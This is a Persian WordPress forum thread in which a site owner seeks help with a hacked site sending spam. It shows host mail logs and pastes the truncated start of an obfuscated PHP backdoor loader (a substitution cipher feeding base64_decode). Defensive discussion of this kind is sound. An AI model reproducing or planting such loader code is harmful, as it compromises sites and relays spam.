hiwa

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت + جزئیات خطا

5 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 


[27-Dec-2016 20:48:46 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit


[28-Dec-2016 03:32:25 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

ویرایش شده در توسط hiwa
1

به اشتراک گذاری این پست


لینک به پست

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

0

به اشتراک گذاری این پست


لینک به پست
در 5 ساعت قبل، hiwa گفته است :

محتوای فایل ajax61.php هم به این شکله :


<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

1

به اشتراک گذاری این پست


لینک به پست

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

0

به اشتراک گذاری این پست


لینک به پست

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO  بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط chemist
      با سلام و احترام؛
      یک سوال از کارشناسان محترم انجمن وردپرس پارسی دارم؛ در چند تا از گروه های تلگرام وردپرس این سوال رو پرسیدم کسی نتونست راهنمایی بکنه. ممنون میشم در حد مبتدی راهنمایی بفرمائین.
      من قالبی نصب کردم که برای چند تا از صفحات، امکان ویرایش مستقیم صفحه از قسمت برگه ها را بسته و حتی ویرایش محتوا از طریق کنترل پنل قالب انجام می شود. تا اینجای کار همه چیز خوبه! ولی وقتی میخوام خودم برگه ای رو ایجاد کنم استایلش به زیبایی استایل صفحات پیش فرض قالب نیست. چطور میتونم از این استایل (قالب) صفحات پیش فرض  برای صفحات ایجاد شده توسط خودم نیز استفاده کنم؟
      با توجه به اینکه نمیدونم دنبال چی و کجا باید بگردم! کدهای صفحات پیش فرض قالب رو اینجا قرار میدم که دوستان با توجه به کدها راهنمایی کنن که باید چه کاری انجام بدهم؟
      <?php /* Template Name: تماس با ما */ Global $CPage; $CPage = 'Contact'; Blade('Page.Contact'); <?php /* Template Name: قوانین */ Global $Options; Global $CPage; $CPage = 'Rules'; Blade('Page.Rules', ['Rules' => $Options->Site_Rules]); من میخوام بقیه صفحاتی که ایجاد می کنم استایل صفحه قوانین را داشته باشه، در صورتی که برای پیج ساخته شده قالب را قوانین انتخاب کنم، محتوای صفحه قوانین را به جای محتوای نوشته شده نمایش می دهد.
      با سپاس فراوان
    • توسط صدف ترک
      سسلام
      روزتون بخیر
      من چند وقته حملات brute force دارم item security رو نصب کردم. رمزم قوی است و recaocha هم کذاشتم ولی بازم حمله brute forceاتفاق میفته آیا امکان هک وجود دارد؟؟
    • توسط david7222222222
      چطور میتونم تقویم یک افزونه ی وردپرس رو شمسی کنم ؟ از تقویم این افزونه برای حسابداری و ثبت قرار ملاقات استفاده میشه و باید در نمایش هم کاملا شمسی باشه.لطفا کمک کنید ممنون
    • توسط hosseiny.mahdi
      از افرادی که به صورت تمام وقت تمایل به همکاری دارند دعوت میشود رزومه کاری خود را به شماره انتهای آگهی واتساپ نمایند تا پس از بررسی و مصاحبه با شرایط مناسب دعوت به همکاری شوند.
      ⁦⚙️⁩ موارد تخصصی مورد نیاز:
      ⚫طراح حرفه ای سایت
      ⚫متخصص وردپرس
      ⚫تسلط به پلاگین های وردپرس
      ⚫مسلط به امنیت وردپرس
      ⚫تسلط به css , html5,php , jQuery , JavaScript
      ⚫تسلط به سئو تکنیکال و محتوا
      ⚫تسلط به سفارشی سازی قالب ها و افزونه ها
      ⚫تسلط به اختصاصی سازی قالب وردپرس بصورت بهینه و استاندارد
      ⚫تسلط به AdWords , webmaster tools , analytics
      ⚫توانایی پیاده سازی سایت از روی طرح های psd
      ⚫تسلط به کنترل پنل های هاستینگ
      ⚫تسلط به طراحی ریسپانسیو
      ⚫تسلط به UI ,UX
      ⚫تسلط به عیب یابی و رفع مشکلات وردپرسی
      ⚫ مسلط به لینک سازی صحیح داخلی و خارجی
       
      ⁦⚙️⁩ موارد شخصیتی مورد نیاز :
      ⚫ تعهد کاری بالا و منظم
      ⚫ متخصص حرفه ای در کار خود
      ⚫ سابقه کار حداقل ۲ سال
      ⚫ نمونه کار قوی و متعدد
      ⚫توانایی تجزیه و تحلیل و حل مسئله
      ⚫ مستعد و خلاق
      ⚫ صفر تا صد مسلط به طراحی سایت
      ⚫ متعهد به زمان‌بندی
      ⚫ انجام وظایف محوله با نهایت دقت و ظرافت
      ⚫پایبند به اصول اخلاقی در تعاملات بین فردی و سازمانی
      ⚫ توانمندی کار تیمی
      ⚫ تمایل به ارتقاء و پیشرفت
      ⁦⚙️⁩ برخی ویژگی‌های مشمول:
      ⚫ حقوق ثابت عالی
      ⚫ ایاب و ذهاب
      ⚫ بیمه تامین اجتماعی
      ⚫ عیدی
      ⚫ پاداش
      ⚫ کارمزد مجزا برای هر پروژه
      ⚫ قابلیت ارتقاء جایگاه
      ⚫ نزدیک مترو
      ⚫از ۹ صبح تا ۱۸ و پنجشنبه ها تا ۱۴
      ⚫استخدام کارآموزان قوی(پس از یک ماه کارآموزی و رضایت)
       
    • توسط zuhair
      با عرض سلام و خسته نباشید خدمت اعضا
      دوستان بنده به یه مشکلی برخوردم اونم اینکه یه پلاکینی دارم که میخوام از پایگاه داده (sql) با شرط روی فیلد تاریخ جستجو کنم و نتایج رو تو جدول نشون بدم.
      مشکل من اینجاست که از تاریخ 1901/12/15 به بعد رو میتونم بخونم و اطلاعات رو بگیرم ، ولی قبل اون تاریخ هرچی بخوام بخونم از تو پایگاه داده برام تاریخ 1970/01/01 ست میکنه و نتایج اون رو برمیگردونه . مثلا اگر بخوام تاریخ  1398/10/29 یاحتی تاریخ 1901/12/14  رو شرط بزارم خودکار تاریخ رو 1970/01/01 ست میکنه و نتایج رو براساس (1970/01/01) نشون میده. 
      ممنون میشم اگه راهنمایی کنید
      با تشکر